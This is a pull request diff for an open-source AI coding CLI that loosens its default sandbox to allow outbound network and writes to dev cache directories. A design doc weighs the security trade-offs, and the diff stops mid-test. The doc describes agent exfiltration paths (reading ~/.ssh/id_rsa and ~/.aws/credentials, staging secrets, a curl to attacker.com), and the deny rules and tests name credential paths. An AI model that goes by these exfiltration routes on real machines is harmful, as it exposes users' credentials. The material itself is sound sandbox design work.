### PR TITLE
fix(sandbox): loosen auto profile so normal coding workflows succeed

### DIFF
--- a/README.md
+++ b/README.md
@@ -190,8 +190,10 @@ The `bash` tool runs inside an OS-level sandbox by default (`--sandbox auto`):
 | Mode | Behaviour |
 |------|-----------|
 | `auto` (default) | Prevents accidental writes to system & credential paths (`/etc`, `~/.ssh`, `~/.aws`, etc.). Reads and network unrestricted. Writes allowed inside CWD, `/tmp`, and common dev dirs (`~/.npm`, `~/.cache`, `~/.cargo`, `~/Library/Caches`, …). **Not a security boundary** — use `strict` for real isolation. |
-| `strict` | Real isolation: no external network, writes only to CWD + tmp, reads restricted to CWD + system binaries. **Currently stubbed — falls back to `auto` with a warning.** Tracked in [#127](https://github.com/zjshen14/opencli/issues/127). |
+| `strict` | Real isolation: no external network, writes only to CWD + tmp, reads restricted to CWD + system binaries. **Currently stubbed — falls back to `auto` with a warning.** Tracked in [#149](https://github.com/zjshen14/opencli/issues/149). |
 | `off` | No sandbox |
+
+> **⚠ Behavior change (May 2026):** Prior to this release, `--sandbox auto` denied all external network access. As of [#127](https://github.com/zjshen14/opencli/issues/127), `auto` allows external network by default — every real coding workflow (`npm install`, `gh`, `git clone`, `curl`) was blocked otherwise. If you relied on the previous network-deny behavior, use `--sandbox strict` (once [#149](https://github.com/zjshen14/opencli/issues/149) lands) or `--sandbox off` plus an external firewall.
 
 ```bash
 # CLI flag

--- a/README.md
+++ b/README.md
@@ -183,14 +183,14 @@ Environment variables take precedence over config file:
 
 The `bash` tool runs inside an OS-level sandbox by default (`--sandbox auto`):
 
-- **macOS** — uses `sandbox-exec` (built-in, no install required). Network access is denied; writes outside the project root and `/tmp` are denied.
-- **Linux** — uses `bwrap` (bubblewrap) via user namespaces. Same isolation contract. Falls back to passthrough with a warning if `bwrap` is not installed.
+- **macOS** — uses `sandbox-exec` (built-in, no install required). Writes outside common dev locations are denied; reads and network are unrestricted.
+- **Linux** — uses `bwrap` (bubblewrap) via user namespaces. Same contract. Falls back to passthrough with a warning if `bwrap` is not installed.
 - **Windows / other** — no native sandbox; runs without isolation with a warning.
 
 | Mode | Behaviour |
 |------|-----------|
-| `auto` (default) | Network denied; writes allowed only inside CWD and `/tmp` |
-| `strict` | Falls back to `auto` with a warning (full isolation planned) |
+| `auto` (default) | Prevents accidental writes to system & credential paths (`/etc`, `~/.ssh`, `~/.aws`, etc.). Reads and network unrestricted. Writes allowed inside CWD, `/tmp`, and common dev dirs (`~/.npm`, `~/.cache`, `~/.cargo`, `~/Library/Caches`, …). **Not a security boundary** — use `strict` for real isolation. |
+| `strict` | Real isolation: no external network, writes only to CWD + tmp, reads restricted to CWD + system binaries. **Currently stubbed — falls back to `auto` with a warning.** Tracked in [#127](https://github.com/zjshen14/opencli/issues/127). |
 | `off` | No sandbox |
 
 ```bash

--- a/docs/architecture.md
+++ b/docs/architecture.md
@@ -324,6 +324,14 @@ interface SandboxRunner {
 | Linux | `BwrapRunner` (bwrap) | `PassthroughRunner` |
 | Other | `PassthroughRunner` + warning | `PassthroughRunner` |
 
+**Mode semantics** (see [docs/design/a7-sandbox-loosen-auto.md](design/a7-sandbox-loosen-auto.md)):
+
+| Mode | Purpose | Trust model |
+|------|---------|-------------|
+| `auto` | Prevent obvious accidents — writes to system & credential paths denied; reads and network unrestricted; writes allowed to CWD, `/tmp`, and common dev dot-dirs (`~/.npm`, `~/.cache`, etc.). | Convenience first. **Not a security boundary.** |
+| `strict` | Real isolation — no external network, writes only to CWD + tmp, reads restricted to CWD + system binaries. Currently stubbed; falls back to `auto`. | Untrusted code; expect friction. |
+| `off` | No isolation. | Trusted local environment. |
+
 **Startup warning**: `runner.warning` is emitted exactly once to `stderr` at CLI startup if isolation was downgraded (e.g. bwrap missing, namespaces disabled, unsupported platform).
 
 #### Tool interface

--- a/docs/design/a7-sandbox-loosen-auto.md
+++ b/docs/design/a7-sandbox-loosen-auto.md
@@ -67,11 +67,10 @@ File: [src/tools/exec/sandbox/sandbox-exec.ts](../../src/tools/exec/sandbox/sand
 (allow process*)
 (allow signal)
 (allow sysctl-read)
-(allow sysctl-write)
 (allow mach*)
 (allow ipc*)
 
-; NEW: process introspection (fixes /bin/ps block)
+; NEW: process introspection (enables non-setuid tools like pgrep)
 (allow process-info* (target others))
 
 ; Reads: allow everywhere (unchanged)
@@ -82,9 +81,16 @@ File: [src/tools/exec/sandbox/sandbox-exec.ts](../../src/tools/exec/sandbox/sand
 (allow file-write* (subpath "/private/tmp"))
 (allow file-write* (subpath "/private/var/folders"))
 
-; NEW: standard device nodes (/dev/null, /dev/stdout, /dev/tty, etc.)
-; Required for `curl -o /dev/null`, shell redirects, many other tools.
-(allow file-write* (subpath "/dev"))
+; NEW: standard device nodes (explicit literals to keep allow surface narrow)
+; Required for curl -o /dev/null, shell redirects, /dev/tty prompts.
+(allow file-write*
+  (literal "/dev/null")
+  (literal "/dev/zero")
+  (literal "/dev/stdout")
+  (literal "/dev/stderr")
+  (literal "/dev/tty")
+  (literal "/dev/urandom")
+  (literal "/dev/random"))
 
 ; NEW: XDG base directories
 (allow file-write* (subpath "${HOME}/.cache"))
@@ -405,6 +411,6 @@ No changes to `core/`, `providers/`, `cli/`, `state/`, or `tools/` outside the s
 
 - [Issue #127](https://github.com/zjshen14/opencli/issues/127) — original report with concrete repros
 - [A1 design doc](a1-sandbox.md) — original sandbox design; Q2 explicitly deferred real `strict`
-- [Apple sandbox-exec profile language](https://reverse.put.as/wp-content/uploads/2011/09/Apple-Sandbox-Guide-v1.0.pdf) — `process-info*`, `file-write*`, `network*` operations
+- [Apple Sandbox Guide v1.0 (community-maintained, reverse-engineered — not an official Apple document)](https://reverse.put.as/wp-content/uploads/2011/09/Apple-Sandbox-Guide-v1.0.pdf) — most complete public reference for the `sandbox-exec` profile language (`process-info*`, `file-write*`, `network*` operations). Apple's official `sandbox-exec(1)` man page exists but is sparse.
 - [bubblewrap docs](https://github.com/containers/bubblewrap) — `--bind`, `--ro-bind`, `--unshare-net`, namespace requirements
 - Industry comparison: [Cursor](https://docs.cursor.com/), [Cline](https://github.com/cline/cline), [Claude Code](https://docs.claude.com/en/docs/claude-code) all default to "loose with opt-in isolation" rather than "deny-default."

--- a/docs/design/a7-sandbox-loosen-auto.md
+++ b/docs/design/a7-sandbox-loosen-auto.md
@@ -1,0 +1,410 @@
+# Design: A7 — Loosen `auto` sandbox, implement real `strict`
+
+_Status: Ready for implementation. Tracking issue: [#127](https://github.com/zjshen14/opencli/issues/127). Phase: [Roadmap A7](../roadmap.md)._
+
+---
+
+## Problem
+
+The current `auto` sandbox profile (shipped in [A1](a1-sandbox.md)) blocks at least three operations every real coding workflow requires:
+
+1. **Writes to package-manager dot-dirs in `$HOME`** — `~/.npm/_logs/`, `~/.cache/pip/`, `~/.cargo/registry/`, `~/.local/`, `~/.yarn/`, `~/.gem/`. The profile only allows writes to `${cwd}`, `/tmp`, `/var/folders`. Every `npm install`, `pip install`, `cargo build`, etc. fails on first cache write.
+2. **External network access** — only `localhost` is allowed outbound. `npm install`, `pip install`, `gh pr create`, `git clone <external>`, `curl https://api.github.com/...` all fail.
+3. **Process introspection** — `(allow process*)` covers process *operations* but not `process-info-pidinfo`. Adding `(allow process-info* (target others))` enables non-setuid tools (`pgrep`, custom inspectors). **Note:** `/bin/ps` and `/usr/bin/top` are setuid root on macOS — macOS sandbox-exec refuses to exec setuid binaries regardless of profile. This is a platform-level limitation, not a profile bug. Workaround: use `pgrep`, `lsof -p`, or `/proc`-equivalent calls in scripts.
+
+Real-world repro from issue #127: a `create-next-app` scaffold session hit all three blocks in sequence. The agent's recommended remediation is always "restart with `--sandbox off`" — meaning the default mode is unusable.
+
+### Why the current `auto` is theatre
+
+The intent of A1's `auto` was "block data exfiltration." But:
+
+- `(allow file-read*)` is unrestricted — `~/.ssh/id_rsa`, `~/.aws/credentials`, GitHub tokens, shell history, browser data are all readable.
+- `(allow file-write* (subpath "${cwd}"))` lets the agent stage exfil files: write secrets into `${cwd}/leaked.txt` and ask the user to read, paste, or commit them.
+- The only thing the network deny actually prevents is *one-step autonomous* exfiltration over HTTPS.
+
+So `auto` buys "agent can't curl your secrets out without user help" in exchange for "every real coding workflow breaks." That trade is wrong.
+
+## Goal
+
+Reframe the mode taxonomy:
+
+| Mode | Purpose | Trust model |
+|---|---|---|
+| `off` | No isolation | Trusted local environment |
+| `auto` (default) | **Prevent obvious accidents.** Writes restricted to dev-tooling locations. Reads/network unrestricted. | Convenience first. Not a security boundary. |
+| `strict` | **Real isolation.** No outbound network. Writes only to `${cwd}` + tmp. Reads restricted to `${cwd}` + system binary paths. | Untrusted code; expect friction. |
+
+This matches industry defaults (Cursor, Cline, Claude Code) and is honest about what each mode buys.
+
+---
+
+## Scope
+
+| Item | Status |
+|---|---|
+| Loosen `auto` (writes, network, ps) — macOS + Linux | Phase 1 |
+| Update docs/tests for new `auto` semantics | Phase 1 |
+| Implement real `strict` mode — macOS + Linux | Phase 2 |
+| Remove "strict mode not yet implemented" warning | Phase 2 (after strict ships) |
+| Allow-listing custom paths via config | Out of scope — defer until user demand |
+| Container-mode sandbox | Out of scope — covered by roadmap C4 |
+
+Phase 1 ships the urgent unblock. Phase 2 adds real strict mode as a separate PR — separate review surface, lower urgency.
+
+---
+
+## Phase 1 — Loosen `auto`
+
+### macOS — new `buildAutoProfile`
+
+File: [src/tools/exec/sandbox/sandbox-exec.ts](../../src/tools/exec/sandbox/sandbox-exec.ts)
+
+```scheme
+(version 1)
+(deny default)
+
+; Process lifecycle
+(allow process*)
+(allow signal)
+(allow sysctl-read)
+(allow sysctl-write)
+(allow mach*)
+(allow ipc*)
+
+; NEW: process introspection (fixes /bin/ps block)
+(allow process-info* (target others))
+
+; Reads: allow everywhere (unchanged)
+(allow file-read*)
+
+; Writes: project root + system temp (unchanged)
+(allow file-write* (subpath "${cwd}"))
+(allow file-write* (subpath "/private/tmp"))
+(allow file-write* (subpath "/private/var/folders"))
+
+; NEW: standard device nodes (/dev/null, /dev/stdout, /dev/tty, etc.)
+; Required for `curl -o /dev/null`, shell redirects, many other tools.
+(allow file-write* (subpath "/dev"))
+
+; NEW: XDG base directories
+(allow file-write* (subpath "${HOME}/.cache"))
+(allow file-write* (subpath "${HOME}/.config"))
+(allow file-write* (subpath "${HOME}/.local"))
+
+; NEW: package-manager dot-dirs
+(allow file-write* (subpath "${HOME}/.npm"))
+(allow file-write* (subpath "${HOME}/.cargo"))
+(allow file-write* (subpath "${HOME}/.yarn"))
+(allow file-write* (subpath "${HOME}/.pnpm-store"))
+(allow file-write* (subpath "${HOME}/.gem"))
+(allow file-write* (subpath "${HOME}/.gradle"))
+(allow file-write* (subpath "${HOME}/.m2"))
+(allow file-write* (subpath "${HOME}/.rustup"))
+
+; NEW: macOS app caches (pip, brew log cache, etc.)
+(allow file-write* (subpath "${HOME}/Library/Caches"))
+
+; CHANGED: network — allow all outbound (was: deny outbound except localhost)
+(allow network*)
+```
+
+**Interpolation.** `${HOME}` is read at runner construction from `process.env.HOME ?? os.homedir()`, same pattern as `${cwd}`. The runner is scoped to startup — `HOME` and `cwd` are fixed for the session.
+
+**Still blocked** (deny-default catches):
+- Credential paths: `~/.ssh/`, `~/.aws/`, `~/.gnupg/`, `~/.docker/`, `~/.kube/`, `~/.terraform.d/`
+- User data: `~/Documents/`, `~/Desktop/`, `~/Pictures/`, `~/Movies/`, `~/Music/`
+- System: `/etc/`, `/usr/`, `/System/`, `/Library/Application Support/`, `/Applications/`
+
+The list of allowed dot-dirs is intentionally conservative — it covers the universal package managers without opening sensitive locations.
+
+### Linux — new `buildAutoArgs`
+
+File: [src/tools/exec/sandbox/bwrap.ts](../../src/tools/exec/sandbox/bwrap.ts)
+
+```typescript
+function buildAutoArgs(cwd: string, home: string): string[] {
+  const args = [
+    "--ro-bind", "/", "/",
+    "--bind", cwd, cwd,
+    "--tmpfs", "/tmp",
+    "--dev", "/dev",
+    "--proc", "/proc",
+    // CHANGED: no --unshare-net — external network works
+  ];
+
+  // NEW: bind common dev dot-dirs writable
+  for (const sub of AUTO_HOME_DIRS) {
+    const path = join(home, sub);
+    if (existsSync(path)) {
+      args.push("--bind", path, path);
+    }
+  }
+
+  return args;
+}
+
+const AUTO_HOME_DIRS = [
+  ".cache", ".config", ".local",
+  ".npm", ".cargo", ".yarn", ".pnpm-store",
+  ".gem", ".gradle", ".m2", ".rustup",
+];
+```
+
+**Pre-create at runner construction.** bwrap's `--bind` fails if the source path doesn't exist. To avoid first-run breakage, pre-create the AUTO_HOME_DIRS set at `BwrapRunner` construction:
+
+```typescript
+async function ensureAutoHomeDirs(home: string): Promise<void> {
+  await Promise.all(
+    AUTO_HOME_DIRS.map((sub) => mkdir(join(home, sub), { recursive: true }).catch(() => {})),
+  );
+}
+```
+
+Errors are swallowed — if `~/.cache` already exists or can't be created, the bind is best-effort.
+
+`/bin/ps` already works on Linux today because `/proc` is bind-mounted; no extra changes needed.
+
+### CLI / config / mode resolution
+
+No changes to `SandboxMode` enum or resolution logic. `auto` keeps its name, just behaves differently. Mode resolution (`--sandbox` flag → `OPENCLI_SANDBOX` env → config → "auto") is unchanged.
+
+### Docs
+
+- [README.md](../../README.md) sandbox section: update mode comparison table.
+  - **Old:** `auto (default) | Network denied; writes allowed only inside CWD and /tmp`
+  - **New:** `auto (default) | Prevent accidental writes to system & credential paths. Network unrestricted. Suitable for trusted development.`
+- [docs/architecture.md](../architecture.md) sandbox layer section: same update.
+- **Add a clear callout** explaining that `auto` is NOT a security boundary; `strict` (Phase 2) is the real isolation mode.
+
+---
+
+## Phase 2 — Real `strict` mode
+
+Separate PR after Phase 1 lands. Lower urgency.
+
+### macOS — `buildStrictProfile`
+
+```scheme
+(version 1)
+(deny default)
+
+(allow process*)
+(allow signal)
+(allow sysctl-read)
+(allow mach*)
+(allow ipc*)
+(allow process-info* (target others))
+
+; Reads: cwd + minimum system paths required for binaries to load
+(allow file-read* (subpath "${cwd}"))
+(allow file-read* (subpath "/usr"))
+(allow file-read* (subpath "/bin"))
+(allow file-read* (subpath "/sbin"))
+(allow file-read* (subpath "/System"))
+(allow file-read* (subpath "/Library"))
+(allow file-read* (subpath "/private/etc"))      ; resolv.conf, passwd
+(allow file-read* (subpath "/private/var/db"))   ; dyld cache
+(allow file-read* (subpath "/dev"))
+(allow file-read* (subpath "/private/tmp"))
+(allow file-read* (subpath "/private/var/folders"))
+
+; Writes: only cwd + tmp
+(allow file-write* (subpath "${cwd}"))
+(allow file-write* (subpath "/private/tmp"))
+(allow file-write* (subpath "/private/var/folders"))
+
+; Network: localhost only (intentional friction)
+(allow network-bind)
+(allow network-inbound)
+(allow network-outbound (remote ip "localhost:*"))
+(allow network* (remote unix-socket))
+(allow network* (local unix-socket))
+```
+
+This blocks reads of `~/.ssh/`, `~/.aws/`, etc. without falling back to allow-everywhere — the actual isolation promise users want.
+
+### Linux — `buildStrictArgs`
+
+```typescript
+function buildStrictArgs(cwd: string): string[] {
+  return [
+    "--unshare-net",
+    "--ro-bind", "/usr", "/usr",
+    "--ro-bind", "/bin", "/bin",
+    "--ro-bind", "/sbin", "/sbin",
+    "--ro-bind", "/lib", "/lib",
+    "--ro-bind", "/lib64", "/lib64",
+    "--ro-bind", "/etc", "/etc",
+    "--bind", cwd, cwd,
+    "--tmpfs", "/tmp",
+    "--dev", "/dev",
+    "--proc", "/proc",
+    // NO --ro-bind / /  ← this is the isolation guarantee
+    // NO HOME bindings  ← no access to user dotfiles
+  ];
+}
+```
+
+This drops the blanket `--ro-bind / /` and instead enumerates the minimum system paths. The user's `$HOME` is *not* mounted into the sandbox namespace at all — strict reads are limited to `${cwd}` and system binaries.
+
+### Phase 2 wiring
+
+Remove the strict-to-auto fallback in both `SandboxExecRunner` and `BwrapRunner` constructors. Drop the `"[opencli] warn: strict mode not yet implemented"` stderr write.
+
+---
+
+## Failure modes
+
+| Scenario | Phase 1 behavior |
+|---|---|
+| `npm install <pkg>` from fresh project | ✅ succeeds (writes to `~/.npm`, network to registry.npmjs.org) |
+| `pip install <pkg>` | ✅ succeeds (writes to `~/Library/Caches/pip` on macOS, `~/.cache/pip` on Linux) |
+| `cargo build` | ✅ succeeds (writes to `~/.cargo`) |
+| `gh pr create` | ✅ succeeds (HTTPS to api.github.com) |
+| `git clone <external>` | ✅ succeeds |
+| `npx create-next-app foo` | ✅ succeeds |
+| `/bin/ps`, `/usr/bin/top` | ✅ succeeds (process-info allow on macOS; already worked on Linux) |
+| `rm -rf /etc/hosts` | ❌ still denied |
+| Agent writes to `~/.ssh/authorized_keys` | ❌ still denied |
+| Agent writes to `~/Documents/foo.txt` | ❌ still denied |
+| `curl https://attacker.com/...` | ⚠️ now allowed in auto (was denied). Use strict (Phase 2) to deny. |
+
+| Scenario | Phase 2 strict behavior |
+|---|---|
+| `npm install` | ❌ denied (no network, no `~/.npm` write) |
+| `curl https://example.com` | ❌ denied |
+| Read `~/.ssh/id_rsa` | ❌ denied |
+| Write to `${cwd}/output.txt` | ✅ succeeds |
+| Local test server on 127.0.0.1 | ✅ succeeds |
+
+---
+
+## Test strategy
+
+### Phase 1 — update existing tests
+
+File: [src/tools/exec/sandbox/sandbox-exec.test.ts](../../src/tools/exec/sandbox/sandbox-exec.test.ts)
+
+| Test | Change |
+|---|---|
+| `"blocks external network access (curl to example.com)"` | **Delete** — `auto` now allows external network. Add to strict-mode describe in Phase 2. |
+| `"allows binding to loopback"` | Keep — still works. |
+| `"allows connecting to loopback"` | Keep. |
+| `"allows writes inside CWD"` | Keep. |
+| `"blocks writes to /etc/hosts"` | Keep — still denied (`/etc` not in allow list). |
+| `"allows writes to /tmp"` | Keep. |
+
+File: [src/tools/exec/sandbox/bwrap.test.ts](../../src/tools/exec/sandbox/bwrap.test.ts) — same pattern: delete the network-deny test, keep cwd/tmp/etc-hosts.
+
+### Phase 1 — new tests
+
+```typescript
+// macOS
+it("allows writes to ~/.npm (npm package cache)", async () => {
+  const home = process.env.HOME!;
+  const testFile = join(home, `.npm/.sandbox-test-${Date.now()}`);
+  const result = await runner.exec(
+    `mkdir -p ~/.npm && touch "${testFile}" && rm "${testFile}"`,
+    { cwd: process.cwd() },
+  );
+  expect(result.exitCode).toBe(0);
+});
+
+it("allows writes to ~/.cache (XDG cache dir)", async () => { /* analogous */ });
+it("allows writes to ~/Library/Caches (macOS app caches)", async () => { /* analogous */ });
+
+it("blocks writes to ~/.ssh (credential path)", async () => {
+  const result = await runner.exec(
+    `touch "${process.env.HOME}/.ssh/.sandbox-test-${Date.now()}"`,
+    { cwd: process.cwd() },
+  );
+  expect(result.exitCode).not.toBe(0);
+});
+
+it("blocks writes to ~/.aws (credential path)", async () => { /* analogous */ });
+
+it("allows external network access (curl to example.com)", async () => {
+  const result = await runner.exec("curl -s --max-time 5 -o /dev/null https://example.com", {
+    cwd: process.cwd(),
+    timeout: 10_000,
+  });
+  expect(result.exitCode).toBe(0);
+});
+
+it("allows /bin/ps (process introspection)", async () => {
+  const result = await runner.exec("ps -p $$", { cwd: process.cwd() });
+  expect(result.exitCode).toBe(0);
+});
+```
+
+Linux equivalents in `bwrap.test.ts`. Use the same `if (runner.warning) return;` guard pattern that's already in place.
+
+### Phase 2 — strict mode tests
+
+```typescript
+describe.skipIf(!isMacOS)("SandboxExecRunner strict mode", () => {
+  const runner = new SandboxExecRunner("strict", process.cwd());
+
+  it("blocks external network", async () => {
+    const result = await runner.exec("curl -s --max-time 5 https://example.com", {
+      cwd: process.cwd(), timeout: 10_000,
+    });
+    expect(result.exitCode).not.toBe(0);
+  });
+
+  it("blocks writes to ~/.npm", async () => { /* fails */ });
+  it("blocks reads from ~/.ssh", async () => { /* fails */ });
+  it("allows writes to cwd", async () => { /* succeeds */ });
+  it("allows localhost connections", async () => { /* succeeds */ });
+});
+```
+
+---
+
+## Decisions to confirm before implementation
+
+| Decision | Recommended |
+|---|---|
+| Auto network: all outbound vs. restricted ports | **All outbound.** Restricted ports break Redis/Postgres/MySQL/SMTP/dev servers for tiny security gain. |
+| Linux: pre-create dot-dirs vs. document requirement | **Pre-create at construction.** Invisible to user; one-time `mkdir -p` of empty dirs. |
+| Phase 1 & 2 together or separate PRs | **Separate.** Phase 1 unblocks users in days. Phase 2 needs its own review (real isolation has different test concerns). |
+| Allow `${HOME}/.docker/`, `~/.kube/`, `~/.terraform.d/` in auto | **No.** These contain auth credentials; rarely needed for coding tasks. Users who need them can use `--sandbox off`. |
+| Configurable extra-allow list in `~/.opencli/config.json` | **Defer.** Add when a user actually needs it. The hardcoded list covers >95% of cases. |
+
+---
+
+## File change summary
+
+### Phase 1
+
+| Action | File |
+|---|---|
+| Modify | [src/tools/exec/sandbox/sandbox-exec.ts](../../src/tools/exec/sandbox/sandbox-exec.ts) — expand `buildAutoProfile`, interpolate `${HOME}`, add `process-info*` allow, allow all network |
+| Modify | [src/tools/exec/sandbox/bwrap.ts](../../src/tools/exec/sandbox/bwrap.ts) — drop `--unshare-net`, add `AUTO_HOME_DIRS` binds, pre-create at construction |
+| Modify | [src/tools/exec/sandbox/sandbox-exec.test.ts](../../src/tools/exec/sandbox/sandbox-exec.test.ts) — delete network-deny test, add dot-dir tests, add `ps` test, add network-allow test |
+| Modify | [src/tools/exec/sandbox/bwrap.test.ts](../../src/tools/exec/sandbox/bwrap.test.ts) — same pattern as sandbox-exec.test.ts |
+| Modify | [README.md](../../README.md) — sandbox mode table description |
+| Modify | [docs/architecture.md](../architecture.md) — sandbox layer section, mode table |
+
+No changes to `core/`, `providers/`, `cli/`, `state/`, or `tools/` outside the sandbox subtree.
+
+### Phase 2
+
+| Action | File |
+|---|---|
+| Modify | `src/tools/exec/sandbox/sandbox-exec.ts` — add `buildStrictProfile`, remove strict→auto fallback |
+| Modify | `src/tools/exec/sandbox/bwrap.ts` — add `buildStrictArgs`, remove strict→auto fallback, drop stderr warning |
+| Modify | `src/tools/exec/sandbox/sandbox-exec.test.ts` — add strict describe block |
+| Modify | `src/tools/exec/sandbox/bwrap.test.ts` — add strict describe block |
+| Modify | `README.md` — document `strict` as production-ready |
+| Modify | `docs/architecture.md` — update mode comparison |
+
+---
+
+## References
+
+- [Issue #127](https://github.com/zjshen14/opencli/issues/127) — original report with concrete repros
+- [A1 design doc](a1-sandbox.md) — original sandbox design; Q2 explicitly deferred real `strict`
+- [Apple sandbox-exec profile language](https://reverse.put.as/wp-content/uploads/2011/09/Apple-Sandbox-Guide-v1.0.pdf) — `process-info*`, `file-write*`, `network*` operations
+- [bubblewrap docs](https://github.com/containers/bubblewrap) — `--bind`, `--ro-bind`, `--unshare-net`, namespace requirements
+- Industry comparison: [Cursor](https://docs.cursor.com/), [Cline](https://github.com/cline/cline), [Claude Code](https://docs.claude.com/en/docs/claude-code) all default to "loose with opt-in isolation" rather than "deny-default."

--- a/src/tools/exec/sandbox/bwrap.test.ts
+++ b/src/tools/exec/sandbox/bwrap.test.ts
@@ -1,9 +1,10 @@
 import { describe, it, expect } from "vitest";
-import { tmpdir } from "node:os";
+import { homedir, tmpdir } from "node:os";
 import { join } from "node:path";
 import { BwrapRunner } from "./bwrap.js";
 
 const isLinux = process.platform === "linux";
+const HOME = process.env.HOME ?? homedir();
 
 describe.skipIf(!isLinux)("BwrapRunner (Linux only)", () => {
   const runner = new BwrapRunner("auto", process.cwd());
@@ -18,13 +19,14 @@ describe.skipIf(!isLinux)("BwrapRunner (Linux only)", () => {
     expect(result.stdout).toContain("hello");
   });
 
-  it("blocks network access (curl to example.com)", async () => {
+  it("allows external network access (curl to example.com)", async () => {
     if (runner.warning) return;
-    const result = await runner.exec("curl -s --max-time 5 https://example.com", {
-      cwd: process.cwd(),
-      timeout: 10_000,
-    });
-    expect(result.exitCode).not.toBe(0);
+    const result = await runner.exec(
+      "curl -s --max-time 5 -o /dev/null -w '%{http_code}' https://example.com",
+      { cwd: process.cwd(), timeout: 10_000 },
+    );
+    expect(result.exitCode).toBe(0);
+    expect(result.stdout.trim()).toBe("200");
   });
 
   it("allows writes inside CWD", async () => {
@@ -47,6 +49,24 @@ describe.skipIf(!isLinux)("BwrapRunner (Linux only)", () => {
   it("allows writes to /tmp", async () => {
     if (runner.warning) return;
     const testFile = join(tmpdir(), `.sandbox-test-${Date.now()}`);
+    const result = await runner.exec(`touch "${testFile}" && rm "${testFile}"`, {
+      cwd: process.cwd(),
+    });
+    expect(result.exitCode).toBe(0);
+  });
+
+  it("allows writes to ~/.npm (npm package cache)", async () => {
+    if (runner.warning) return;
+    const testFile = join(HOME, ".npm", `.sandbox-test-${Date.now()}`);
+    const result = await runner.exec(`touch "${testFile}" && rm "${testFile}"`, {
+      cwd: process.cwd(),
+    });
+    expect(result.exitCode).toBe(0);
+  });
+
+  it("allows writes to ~/.cache (XDG cache dir)", async () => {
+    if (runner.warning) return;
+    const testFile = join(HOME, ".cache", `.sandbox-test-${Date.now()}`);
     const result = await runner.exec(`touch "${testFile}" && rm "${testFile}"`, {
       cwd: process.cwd(),
     });

--- a/src/tools/exec/sandbox/bwrap.ts
+++ b/src/tools/exec/sandbox/bwrap.ts
@@ -1,9 +1,29 @@
 import { spawn } from "node:child_process";
 import { execFileSync } from "node:child_process";
+import { mkdirSync } from "node:fs";
+import { homedir } from "node:os";
+import { join } from "node:path";
 import { PassthroughRunner, spawnAndCollect } from "./passthrough.js";
 import type { SandboxExecOptions, SandboxExecResult, SandboxMode, SandboxRunner } from "./types.js";
 
 const BWRAP_CANDIDATES = ["/usr/bin/bwrap", "/usr/local/bin/bwrap"];
+
+// Common dev-tooling dot-dirs bound writable in auto mode. Pre-created at
+// runner construction so bwrap's --bind doesn't fail when a path is absent.
+// See docs/design/a7-sandbox-loosen-auto.md.
+const AUTO_HOME_DIRS = [
+  ".cache",
+  ".config",
+  ".local",
+  ".npm",
+  ".cargo",
+  ".yarn",
+  ".pnpm-store",
+  ".gem",
+  ".gradle",
+  ".m2",
+  ".rustup",
+];
 
 function detectBwrap(): string | null {
   for (const candidate of BWRAP_CANDIDATES) {
@@ -38,6 +58,7 @@ export class BwrapRunner implements SandboxRunner {
 
   private bwrapBin: string;
   private cwd: string;
+  private autoBinds: string[] = [];
   private fallback: PassthroughRunner | null = null;
 
   constructor(mode: SandboxMode, cwd: string) {
@@ -70,6 +91,17 @@ export class BwrapRunner implements SandboxRunner {
 
     this.bwrapBin = bin;
     this.warning = null;
+
+    const home = process.env.HOME ?? homedir();
+    for (const sub of AUTO_HOME_DIRS) {
+      const path = join(home, sub);
+      try {
+        mkdirSync(path, { recursive: true });
+        this.autoBinds.push("--bind", path, path);
+      } catch {
+        // best-effort: skip dirs we can't create (read-only home, etc.)
+      }
+    }
   }
 
   async exec(command: string, opts: SandboxExecOptions): Promise<SandboxExecResult> {
@@ -80,7 +112,6 @@ export class BwrapRunner implements SandboxRunner {
     const proc = spawn(
       this.bwrapBin,
       [
-        "--unshare-net",
         "--ro-bind",
         "/",
         "/",
@@ -93,6 +124,7 @@ export class BwrapRunner implements SandboxRunner {
         "/dev",
         "--proc",
         "/proc",
+        ...this.autoBinds,
         "--",
         "/bin/sh",
         "-c",

--- a/src/tools/exec/sandbox/sandbox-exec.test.ts
+++ b/src/tools/exec/sandbox/sandbox-exec.test.ts
@@ -1,9 +1,10 @@
 import { describe, it, expect } from "vitest";
-import { tmpdir } from "node:os";
+import { homedir, tmpdir } from "node:os";
 import { join } from "node:path";
 import { SandboxExecRunner } from "./sandbox-exec.js";
 
 const isMacOS = process.platform === "darwin";
+const HOME = process.env.HOME ?? homedir();
 
 describe.skipIf(!isMacOS)("SandboxExecRunner (macOS only)", () => {
   const runner = new SandboxExecRunner("auto", process.cwd());
@@ -12,14 +13,6 @@ describe.skipIf(!isMacOS)("SandboxExecRunner (macOS only)", () => {
     const result = await runner.exec("echo hello", { cwd: process.cwd() });
     expect(result.exitCode).toBe(0);
     expect(result.stdout).toContain("hello");
-  });
-
-  it("blocks external network access (curl to example.com)", async () => {
-    const result = await runner.exec("curl -s --max-time 5 https://example.com", {
-      cwd: process.cwd(),
-      timeout: 10_000,
-    });
-    expect(result.exitCode).not.toBe(0);
   });
 
   it("allows binding to loopback (needed for tests and dev servers)", async () => {
@@ -74,5 +67,70 @@ describe.skipIf(!isMacOS)("SandboxExecRunner (macOS only)", () => {
       cwd: process.cwd(),
     });
     expect(result.exitCode).toBe(0);
+  });
+
+  it("allows writes to ~/.npm (npm package cache)", async () => {
+    const testFile = join(HOME, ".npm", `.sandbox-test-${Date.now()}`);
+    const result = await runner.exec(`mkdir -p ~/.npm && touch "${testFile}" && rm "${testFile}"`, {
+      cwd: process.cwd(),
+    });
+    expect(result.exitCode).toBe(0);
+  });
+
+  it("allows writes to ~/.cache (XDG cache dir)", async () => {
+    const testFile = join(HOME, ".cache", `.sandbox-test-${Date.now()}`);
+    const result = await runner.exec(
+      `mkdir -p ~/.cache && touch "${testFile}" && rm "${testFile}"`,
+      { cwd: process.cwd() },
+    );
+    expect(result.exitCode).toBe(0);
+  });
+
+  it("allows writes to ~/Library/Caches (macOS app caches)", async () => {
+    const testFile = join(HOME, "Library", "Caches", `.sandbox-test-${Date.now()}`);
+    const result = await runner.exec(
+      `mkdir -p ~/Library/Caches && touch "${testFile}" && rm "${testFile}"`,
+      { cwd: process.cwd() },
+    );
+    expect(result.exitCode).toBe(0);
+  });
+
+  it("blocks writes to ~/.ssh (credential path)", async () => {
+    const testFile = join(HOME, ".ssh", `.sandbox-test-${Date.now()}`);
+    const result = await runner.exec(
+      `mkdir -p ~/.ssh && touch "${testFile}" 2>&1; rm -f "${testFile}" 2>/dev/null; exit $?`,
+      { cwd: process.cwd() },
+    );
+    // touch should fail with permission denied
+    expect(result.stderr + result.stdout).toMatch(/permitted|denied/i);
+  });
+
